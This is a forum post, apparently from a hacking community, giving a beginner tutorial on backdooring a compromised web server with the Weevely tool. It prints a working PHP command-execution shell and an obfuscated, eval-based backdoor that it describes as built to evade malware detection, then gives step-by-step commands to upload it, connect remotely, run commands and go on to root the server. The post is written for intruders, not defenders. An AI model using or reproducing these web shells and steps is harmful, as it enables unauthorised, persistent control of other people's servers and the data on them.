Hi
I have seen many posts of new members of ISA about having problem with backdoor and mainly on back-connect to the server. So i thought to make a small noob friendly tutorial on how to back-connect with a base64 encrypted backdoor (simple php shell) which is very small in size (about 500 bytes). The method which i will demonstrate here is one of the best methods of backdoor and back-connect i have used.

What is Backdoor?

A back door is a means of access to a computer program that bypasses security mechanisms. Let me spell it. In simple words backdoor is a piece of code(It can be trojan, php shell. perl shell etc) injected by a hacker once he brenched the security of a system and welcomes him every time when he want to access the system. No matter even if the security of a system is patched(some exceptions)!

Now to perform this hack the requirements are-

1) A shelled web server - I have mine

To view pic click here http://postimage.org/image/5ccrgbojf/

2) A Python based program called Weevely.

What is Weevely :

Weevely is an unobtrusive PHP backdoor that simulate telnet-like connection. It is used for web attack post exploitation or web hosting account management. With a basic permission to upload PHP files, we only need to generate and upload the “server” PHP code on the target, and run locally Weevely to transmit shell commands.

Weevely is pre installed in Backtrack 5. If you are using another Linux disto you can download it from here Download weevely

Now lets start:

Step 1 - Generate the Backdoor.

Open the weevely tool which you have installed now.

For backtrack users you can run it directly from applications or run command in terminal:

# root@bt:cd /pentest/backdoors/web/weevely#

For the users who have installed it on other Linux distros run the command in terminal:

#root@bt: cd /path to folder of weevely/weevely#

You will get the terminal like this: click here http://postimage.org/image/wd66fo2gh/


Now we have to generate the backdoor in encrypted form so that it will remain in stealth mode and undetected by Linux malware detecting programs.

This can be easily done by weevely.

The php shell which we are going to use is a simple-backdoor.php

The code of this shell is -

Code:
<?php

if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
  echo "</pre>";
  die;
}

?>


For this run the command in weevely terminal which you have opened:

## ./weevely.py generate PASSWORD /path to folder where you have to save shell on your PC/hello.php ##

For example i have encrypted a shell with a password 123456 and saved it on my desktop with name hello.php. Therefore my command is:

##./weevely.py generate 123456 /root/Desktop/hello.php##

As shown in pic click here http://postimage.org/image/dx8j0kmab/

The encrypted code is -


Code:
<?php

$hv4="cmF5KCcnLCcrJywxksIGpvawxW4oYwxXJyYXlfc2xpY2UoJGwxEsJGMwxoJGwxEpLTMpKSkpKTtlY2hv​ICc8LycuJGsuJz4nO30=";
$hv1="wxJGM9Jwx2NvdWwx50wxJzswxkwxYT0kX0NwxPT0wxtJwxRTtpZihyZXNldCgkYSk9wxPScxMicgJiYw​xgJGMoJGEp";
$asp = "xbxasxex6x4x_dxexcxoxdxe";
$hv2="PjwxMwxpe2wxluaV9zZXQoJ2Vycm9yX2xvZycwxsICwxcvZGV2L251bGwnKTskaz0nMzQ1Nic7ZWNoby​AnPCcuJGwxsuJz4nO2V2YWwwxowx";
$hv3="YmFzZTwxY0wxX2RlY29kZShwcmVnX3JlcGxwxhY2UoYXJwxyYXwxkoJy9bXlwxx3PVxzXwxS8nLCcvXH​MvJyksIGwxFy";
$nwb = "str_replace";
$asp = $nwb("x", "", $asp);
eval($asp($nwb("wx", "", $hv1.$hv2.$hv3.$hv4)));

?>


This backdoor is of size 500 bytes only

Step 2 - Upload the Backdoor.

Now upload the shell hello.php to the web server.

Step 3 - Back-Connect.

Many peoples have problem in back-connect as it needs a right port to be chosen which is open and not blocked by firewall. In this method you dont need to worry about ports(open/closed/blocked). we can directly back-connect with the help of weevely.

To back-connect and start terminal to execute the commands locally- type the command:

## ./weevely.py http://www.sitename.com/path to hello.php/hello.php PASSWORD##

For example if you have uploaded the shell in images folder with sub folder uploads then your command will become:

##./weevely.py http://www.sitename.com/images/uploads/hello.php PASSWORD##

where the PASSWORD will be the password which you used while encrypting the shell hello.php

My password is 123456 and therefore my command will become:

##./weevely.py http://www.sitename.com/hello.php 123456##

When everything go right you will be connected to the server with a telnet like session from where you can execute commands locally.

As shown in pic click here http://postimage.org/image/goq6pu3kv/

Step 4 - Execute Commands.

Now i am gonna cheak that is it the same server on which i have uploaded the backdoor and can i execute shell commands?

For this lets start with a simple command " uname -a " which shows information about the version of linux server.

As shown in pic click here http://postimage.org/image/omhhaxnjl/

And yeah the command got executed showing the version of linux server and when you compare shell and above image you will notice that its a same server on which we have uploaded backdoor!!

Now you can go further and explore the files or ROOT the Linux box which is considered as a HOLY GRAIL in hacking.

COMMENT FOR ANY DOUBTS

G0ld3nph30nix Ash3s